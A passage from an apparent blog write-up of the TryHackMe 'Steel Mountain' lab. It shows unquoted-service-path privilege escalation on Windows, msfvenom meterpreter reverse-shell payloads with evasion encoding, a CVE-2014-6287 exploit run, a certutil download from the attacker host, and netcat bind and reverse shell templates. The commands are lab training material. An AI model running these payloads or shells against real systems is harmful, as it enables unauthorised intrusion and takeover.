<h3 id="Find-the-first-flag"><a href="#Find-the-first-flag" class="headerlink" title="Find the first flag"></a>Find the first flag</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fm5ogWBuMVMm5_LQijLt8XcA0gWS.png"></p>
<h3 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h3><p>upload PowerUp.ps1<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FgdCUVrCdJZ3o5hlUp0ZuqyWvQxy.png"><br>load Powershell module</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">load powershell
powershell_shell<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>Execute the PowerUp.ps1 in powershell and input Invoke-AllChecks<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fjh2ps5b6NxsOH8IqatR01OYlmdN.png"><br>Find the unqutoed service AdvancedSystemCareService9<br>Msfvenom make the reverse_shell Advanced.exe</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom <span class="token parameter variable">-p</span> windows/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">10.11</span>.61.17 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">4445</span>  <span class="token parameter variable">-f</span> exe<span class="token operator">></span> Advanced.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Change the directory, upload Advanced.exe<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Ft08KTRhMhoym5e1K1x0JaqPdqA5.png"><br>Check the AdvancedSystemCareService9 status</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">sc qc AdvancedSystemCareService9<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FlsOrtyzGkxiullwS4qtPxQzrKvf.png"><br>Stop the service and restart it, we can get the system privelege shell<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fj3YHuYniVmeE3lD2WOxwJ4SXm7E.png"><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FinI9DrIFXD3sKeHw-BlOtKhEqfw.png"><br>We have to migrate quickly, the sessions will die because not respond services<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FvdVaIXUHfGEeACAuIRuIfyBBs6l.png"><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FhL_bnhfb4wpseTBGnH_o0We1cgk.png"><br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fup38k2lVu4IF4WCoaNHvVBafFKn.png"><br>We can also input this command→migrate the shell automatically</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">run post/windows/manage/migrate<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>The best way is create the binary file which will migrate another process automacally</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom <span class="token parameter variable">-p</span> windows/meterpreter/reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">10.11</span>.61.17 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">4446</span> <span class="token parameter variable">-e</span> x86/shikata_ga_nai <span class="token parameter variable">-b</span> <span class="token string">"<span class="token entity" title="\x00">\x00</span>"</span> <span class="token parameter variable">-i</span> <span class="token number">5</span> <span class="token parameter variable">-a</span> x86 <span class="token parameter variable">--platform</span> win <span class="token assign-left variable">PrependMigrate</span><span class="token operator">=</span>true <span class="token assign-left variable">PrependMigrateProc</span><span class="token operator">=</span>svchost.exe <span class="token parameter variable">-f</span> exe <span class="token parameter variable">-o</span>  Advanced.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>nc shell</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">msfvenom <span class="token parameter variable">-p</span> windows/shell_reverse_tcp <span class="token assign-left variable">LHOST</span><span class="token operator">=</span><span class="token number">10.11</span>.61.17 <span class="token assign-left variable">LPORT</span><span class="token operator">=</span><span class="token number">4446</span>  <span class="token parameter variable">-e</span> x86/shikata_ga_nai <span class="token parameter variable">-b</span> <span class="token string">"<span class="token entity" title="\x00">\x00</span>"</span> <span class="token parameter variable">-i</span> <span class="token number">5</span> <span class="token parameter variable">-a</span> x86 <span class="token parameter variable">--platform</span> win <span class="token assign-left variable">PrependMigrate</span><span class="token operator">=</span>true <span class="token assign-left variable">PrependMigrateProc</span><span class="token operator">=</span>svchost.exe <span class="token parameter variable">-f</span> exe<span class="token operator">></span> Advanced.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Get the system privilege<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/Fky2sZTJExpfXAZZiTSkT6Ywak0O.png"><br>Get the flag2<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FgTXtBi7wodCteqSqXWQjWJoUvzq.png"></p>
<h2 id="Without-Metasploit"><a href="#Without-Metasploit" class="headerlink" title="Without Metasploit"></a>Without Metasploit</h2><h3 id="Use-CVE-2014-6287-to-exploit"><a href="#Use-CVE-2014-6287-to-exploit" class="headerlink" title="Use CVE-2014-6287 to exploit"></a>Use CVE-2014-6287 to exploit</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FoESFFA-W41fhuAwh4McGMgjD7y0.png"><br>modify the ip_addr, local_port<br>Open local server, execute exp<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqmYf-f-FNPxJlX9pYrOPXoEKLSk.png"><br>Execute exp again, we can get the reverse_shell<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FqUl_2Ntcjb_5L1KO3RG14TeriEy.png"></p>
<h3 id="Use-binary-file-winPEAS-exe-to-enumeration-the-systeminfo"><a href="#Use-binary-file-winPEAS-exe-to-enumeration-the-systeminfo" class="headerlink" title="Use binary file winPEAS.exe to enumeration the systeminfo"></a>Use binary file winPEAS.exe to enumeration the systeminfo</h3><p><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FpJFf7HQcWcbq0Q_eCgkzV3hk3UJ.png"></p>
<pre class="line-numbers language-none"><code class="language-none">certutil -urlcache -f http:&#x2F;&#x2F;10.11.61.17&#x2F;winPEAS.exe winpeas.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Execute winpeas.exe in cmd<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FufpRluDGVS5sGMITv9drYhq-ugs.png"><br>Find the service path<br>Use the unqutoed vulnerability or DLL hijacking, the next step can use meterpreter shell or common nc shell to get the Administrator-flag.<br><img src="https://l3vi4th4n.oss-cn-hangzhou.aliyuncs.com/blog-images/FjZGpNXyOIczdCGjvCJJFYRk8RdS.png"></p>
<h3 id="Delivery"><a href="#Delivery" class="headerlink" title="Delivery"></a>Delivery</h3><p>We can use the nc shell or metasploit shell to upgrade our shell.</p>
<h4 id="Netcat-bind-shell"><a href="#Netcat-bind-shell" class="headerlink" title="Netcat bind shell"></a>Netcat bind shell</h4><p>A Bind Shell is when the listener is running on the target and you are presented with a command shell when connecting to the target. In other words the target would be waiting for us to connect to it.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">Target Machine:
Windows: nc.exe <span class="token parameter variable">-nvlp</span> <span class="token operator">&lt;</span>PORT<span class="token operator">></span> <span class="token parameter variable">-e</span> cmd.exe
Linux: <span class="token function">nc</span> <span class="token parameter variable">-nvlp</span> <span class="token operator">&lt;</span>PORT<span class="token operator">></span> <span class="token parameter variable">-e</span> /bin/sh or /bin/bash
Hacker:
<span class="token function">nc</span> <span class="token parameter variable">-nv</span> <span class="token operator">&lt;</span>Target Machine IP<span class="token operator">></span> <span class="token operator">&lt;</span>Target Machine Port<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="Netcat-reverse-shell"><a href="#Netcat-reverse-shell" class="headerlink" title="Netcat reverse shell"></a>Netcat reverse shell</h4><p>When we use a bind shell we are able to connect to a target which is fine if there are no firewalls filtering inbound connections, where as in a reverse shell we would set up the listener on our system (attacker) and have the target connect to us and provide us with a command shell.</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">Hacker:
<span class="token function">nc</span> <span class="token parameter variable">-lnvp</span> <span class="token operator">&lt;</span>PORT<span class="token operator">></span>
Target Machine
Windows: nc.exe <span class="token operator">&lt;</span>Hacker IP<span class="token operator">></span> <span class="token operator">&lt;</span>Hacker Port<span class="token operator">></span>
Linux: <span class="token function">nc</span> <span class="token operator">&lt;</span>Hacker IP<span class="token operator">></span> <span class="token operator">&lt;</span>Hacker Port<span class="token operator">></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h1 id="Summary"><a href="#Summary" class="headerlink" title="Summary"></a>Summary</h1><hr>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Steel-Mountain"><span class="toc-number">1.</span> <span class="toc-text">Steel Mountain</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Target"><span class="toc-number">2.</span> <span class="toc-text">Target</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Process"><span class="toc-number">3.</span> <span class="toc-text">Process</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reconnasissance"><span class="toc-number">3.1.</span> <span class="toc-text">Reconnasissance</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Port-Service-Scan"><span class="toc-number">3.1.1.</span> <span class="toc-text">Port Service Scan</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Go-to-http-10-10-231-27-8080"><span class="toc-number">3.1.2.</span> <span class="toc-text">Go to http:&#x2F;&#x2F;10.10.231.27:8080</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Metasploit"><span class="toc-number">3.2.</span> <span class="toc-text">Metasploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Metasploit-search-exploit"><span class="toc-number">3.2.1.</span> <span class="toc-text">Metasploit search exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Exploiting"><span class="toc-number">3.2.2.</span> <span class="toc-text">Exploiting</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Find-the-first-flag"><span class="toc-number">3.2.3.</span> <span class="toc-text">Find the first flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-number">3.2.4.</span> <span class="toc-text">Privilege Escalation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Without-Metasploit"><span class="toc-number">3.3.</span> <span class="toc-text">Without Metasploit</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Use-CVE-2014-6287-to-exploit"><span class="toc-number">3.3.1.</span> <span class="toc-text">Use CVE-2014-6287 to exploit</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Use-binary-file-winPEAS-exe-to-enumeration-the-systeminfo"><span class="toc-number">3.3.2.</span> <span class="toc-text">Use binary file winPEAS.exe to enumeration the systeminfo</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Delivery"><span class="toc-number">3.3.3.</span> <span class="toc-text">Delivery</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Netcat-bind-shell"><span class="toc-number">3.3.3.1.</span> <span class="toc-text">Netcat bind shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Netcat-reverse-shell"><span class="toc-number">3.3.3.2.</span> <span class="toc-text">Netcat reverse shell</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Summary"><span class="toc-number">4.</span> <span class="toc-text">Summary</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://kelpie.top/post/Virtual%20Attack%20[3].html"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&text=THM Steel Mountain"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&is_video=false&description=THM Steel Mountain"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=THM Steel Mountain&body=Check out this article: http://kelpie.top/post/Virtual%20Attack%20[3].html"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&title=THM Steel Mountain"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://kelpie.top/post/Virtual%20Attack%20[3].html&name=THM Steel Mountain&description=&lt;h1 id=&#34;Steel-Mountain&#34;&gt;&lt;a href=&#34;#Steel-Mountain&#34; class=&#34;headerlink&#34; title=&#34;Steel Mountain&#34;&gt;&lt;/a&gt;Steel Mountain&lt;/h1&gt;&lt;p&gt;Difficulty: Medium→High&lt;br&gt;Score: 6&amp;#x2F;10 (Metasploit) 7.5&amp;#x2F;10 (Without Metasploit)&lt;/p&gt;
&lt;hr&gt;"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://kelpie.top/post/Virtual%20Attack%20[3].html&t=THM Steel Mountain"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2024
    l3vi4th4n
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/k3lpi3b4nsh33">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
